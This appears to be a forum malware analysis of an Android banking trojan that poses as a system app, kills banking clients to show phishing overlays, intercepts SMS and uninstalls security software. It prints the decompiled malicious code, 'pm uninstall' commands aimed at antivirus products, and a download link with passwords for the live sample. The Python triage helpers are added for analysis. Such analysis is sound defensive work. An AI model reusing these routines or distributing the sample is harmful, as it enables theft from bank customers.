Exclusive analysis of the Android virus "银行悍匪" (Bank Bandit)

1. Basic information about the virus sample

FileName: b5910a432d2b866e1028f31874edb32f.apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1: 0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 bytes
Package: langthing.nend
Download: http://yunpan.cn/Q4qHuRLaNivtd    access password 3a90    extraction password: 52pojie

// The virus first disguises itself as a system program to prevent uninstallation; it then tries to uninstall security software; it monitors various banking apps; the keywords used to intercept SMS are encrypted, which makes analysis harder; and it has no MAIN or LAUNCHER component, so no icon appears after installation and the user does not notice that an app has been installed.

2. Virus code analysis

Looking at the AndroidManifest.xml configuration file, we can see that the virus requests a very large number of permissions, many of them high-risk, such as sending SMS, making phone calls, reading log files and restarting applications, and that it has no MAIN or LAUNCHER component.

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />            <!-- receive SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />               <!-- send SMS -->
    <uses-permission android:name="android.permission.READ_SMS" />               <!-- read SMS -->
    <uses-permission android:name="android.permission.WRITE_SMS" />              <!-- edit SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />               <!-- declared a second time in the sample -->
    <uses-permission android:name="android.permission.READ_CONTACTS" />          <!-- read contacts -->
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />         <!-- access to the system settings database -->
    <uses-permission android:name="android.permission.READ_LOGS" />              <!-- read log files -->
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />         <!-- edit contacts -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />       <!-- read phone state -->
    <uses-permission android:name="android.permission.CALL_PHONE" />             <!-- make phone calls -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <!-- receive the boot-completed broadcast -->
    <uses-permission android:name="android.permission.GET_TASKS" />              <!-- get information on running apps -->
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />       <!-- restart (kill) applications -->

Looking further at AndroidManifest.xml, we can see that the program is started through its receiver components TReceiver, deviceAdminReceiver, Alarmreceiver and ShutdownReceiver whenever the phone delivers the corresponding broadcasts (boot completed, device admin enabled, the custom alarm action, shutdown):

        <receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>
        </receiver>
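The manifest indicators described above (high-risk permissions, no MAIN/LAUNCHER activity, a BOOT_COMPLETED receiver at maximum priority, a device-admin receiver) can be checked mechanically during triage. The Python function below is an added example and not code from the original post; it runs on a constructed, cut-down manifest that mirrors the excerpts above, and the HIGH_RISK set is this example's own choice.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace
# Permissions the analysis above singles out as high-risk for this family (example's own list).
HIGH_RISK = {"SEND_SMS", "RECEIVE_SMS", "READ_SMS", "WRITE_SMS", "CALL_PHONE",
             "READ_LOGS", "RESTART_PACKAGES", "GET_TASKS", "WRITE_CONTACTS"}

# Constructed manifest: a cut-down version of the excerpts above, not the full decompiled file.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
  package="langthing.nend">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_LOGS"/>
  <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
  <application>
    <activity android:name=".main"/>
    <receiver android:name=".TReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".deviceAdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

def _has(filt, tag, value):
    """True if the intent-filter contains <tag android:name=value>."""
    return any(e.get(A + "name") == value for e in filt.iter(tag))

def triage(manifest_xml):
    root = ET.fromstring(manifest_xml)
    perms = {p.get(A + "name", "").rsplit(".", 1)[-1] for p in root.iter("uses-permission")}
    r = {"package": root.get("package"), "high_risk_permissions": sorted(perms & HIGH_RISK)}
    # No activity carrying MAIN + LAUNCHER: the app installs without an icon.
    r["no_launcher_activity"] = not any(
        _has(f, "action", "android.intent.action.MAIN") and _has(f, "category", "android.intent.category.LAUNCHER")
        for a in root.iter("activity") for f in a.iter("intent-filter"))
    # Boot receiver registered at Integer.MAX_VALUE priority: handled before any other receiver.
    r["max_priority_boot_receiver"] = any(
        f.get(A + "priority") == str(2**31 - 1) and _has(f, "action", "android.intent.action.BOOT_COMPLETED")
        for f in root.iter("intent-filter"))
    # Device-admin receiver: once the user approves it, a plain uninstall is refused.
    r["device_admin_receiver"] = any(
        x.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN" for x in root.iter("receiver"))
    return r
```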

The code tree of the injected malicious code is as follows:

After the program is installed, it disguises itself as a system program to prevent uninstallation, as shown in the figure:

The code in langthing.nend.main that performs the system disguise is as follows:

private void b()
  {
    // Asks the user to activate the app as a device administrator
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  // poses as a system application in the prompt
    startActivityForResult(localIntent, 1);
  }

When the app detects that a bank client has been launched, it kills that bank's process and shows a custom high-fidelity "phishing interface" built for ICBC, Taobao and others:

private void e()
  {
    // Class name of the activity currently in the foreground
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    // gs, js, jt, tb, dz are apparently the malware's own phishing activities: while one of them
    // is on top, every installed bank client is killed so it cannot reappear over the fake screen
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
}

    // One block per targeted app: look up the row for this bank in the "yh" table; a "jilu"
    // (record) value of 0 means the victim has not been phished yet, so kill the real client,
    // jump to the home screen and launch the matching fake screen (gs, js, jt, tb) on top
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        new Intent("android.intent.action.MAIN");
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);   // FLAG_ACTIVITY_NEW_TASK
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);
      }
    }
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
//  kill each bank's process
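Every per-bank block in e() has the same shape: foreground class-name check, row lookup in the "yh" table, kill the victim package, launch the fake screen. An analyst can recover the complete targeting table from such decompiled source with a small extractor; the Python below is an added example, not part of the original analysis, and runs on a constructed snippet that mirrors two of the blocks above.

```python
import re

# Constructed snippet mirroring the decompiled e() blocks shown above (two of them, trimmed).
DECOMPILED_E = '''
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        startActivity(localIntent54);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        startActivity(localIntent48);
      }
    }
'''

# Lazy gap that is not allowed to run into the next "str.contains(" block, so a truncated
# block can never borrow fields from the one after it.
GAP = r'(?:(?!str\.contains\().)*?'
BLOCK = re.compile(
    r'str\.contains\("(?P<match>[^"]+)"\)\)\s*\{' + GAP          # substring of the foreground class
    + r'new String\[\] \{ "(?P<key>[^"]+)" \}' + GAP             # single-element key: the "yh" row ("jilu" flag)
    + r'restartPackage\("(?P<pkg>[^"]+)"\)' + GAP               # victim package that gets killed
    + r'new Intent\(getApplicationContext\(\), (?P<activity>\w+)\.class\)',  # fake screen launched on top
    re.S)

def targeting_table(src):
    """One record per targeted app, in source order: match, key, pkg, activity."""
    return [m.groupdict() for m in BLOCK.finditer(src)]

def phishing_map(src):
    """Fake-screen activity class -> the real package it impersonates."""
    return {r["activity"]: r["pkg"] for r in targeting_table(src)}
```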

Finding and uninstalling security software:

for (g = "Already root"; ; g = "NOroot")   // g records whether root was obtained; the loop form is a decompiler artifact
   {
     this.C = 5;
     this.E = 5;
     this.B = new String[this.C];
     this.D = new String[this.E];
     this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     // uninstall the security software of 360, Tencent, Kingsoft and others
     this.B[1] = "pm uninstall com.tencent.qqpimsecure";
     this.B[2] = "pm uninstall com.ijinshan.mguard";
     this.B[3] = "pm uninstall com.ijinshan.duba";
     this.B[4] = "pm uninstall com.anguanjia.safe";
     this.D[0] = "com.qihoo360.mobilesafe";                  // the same products, by package name
     this.D[1] = "com.tencent.qqpimsecure";
     this.D[2] = "com.ijinshan.mguard";
     this.D[3] = "com.ijinshan.duba";
     this.D[4] = "com.anguanjia.safe";
     this.s = new o();

Intercepting relevant SMS:

if (i5 == 1)                                  // i5 == 1: an incoming message (str4 = "接收", received)
          if ((server.f == 0) && (server.a != i3))
          {
            server.a(this.a, 1);
            server.b(this.a, i3);
            str4 = "接收";
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);   // sender, body and str5 handed to the server helper
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]/n/n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)                            // decompiler-generated control flow; the branches below are reached via the break/label jumps
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;
        break;
        if (i5 != 2)                          // i5 == 2: an outgoing message (str4 = "发送", sent)
          break;
        if (server.b == i3)
          break label760;
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do                                  // every "sSend" value in the "send" table is passed to server.a
            server.a(this.a, localCursor2.getString(i6));
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);
        }
        server.b = i3;
        str4 = "发送";
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}

Decryption key:

public void a()
  {
    try
    {
      // Copies the asset unhi.db (the "key" database) into the app's private files directory
      InputStream localInputStream = getAssets().open("unhi.db");     // key
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }

  public void a(String paramString)
  {
    // Extract the database only if it is not there yet
    if (!new File(paramString).exists())
      a();
  }

  public void c()
  {
    new l(this).start();
  }

  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  public void onCreate()
  {
    // SMS_RECEIVED receiver registered at Integer.MAX_VALUE priority: it sees each message before the stock SMS app
    this.u = new e();
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");
    this.F = 0;
    this.j = false;
    // Device report: root status (g), Android version and model
    b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
    this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
    a(this.q + "unhi.db");
    // Opens the extracted unhi.db as an SQLite database (helper class a, schema version 1)
    c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
    // Watches the SMS content provider for changes; m is the observer whose onChange is shown above
    m localm = new m(this, new Handler());
    getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
    // Starts the log service
    Intent localIntent = new Intent(getApplicationContext(), log.class);
    localIntent.setFlags(268435456);
    startService(localIntent);



3. Summary

This virus tries to uninstall security software; it uses encryption to make analysis harder; and it hides its running interface so that the user does not notice it. It is clear that mobile security problems are growing more serious, that the techniques are becoming more sophisticated, and that analysis is becoming more difficult.

// Since my own knowledge of cryptography is not even at Hello World level, I was unable to decrypt the relevant information; my ability is limited.
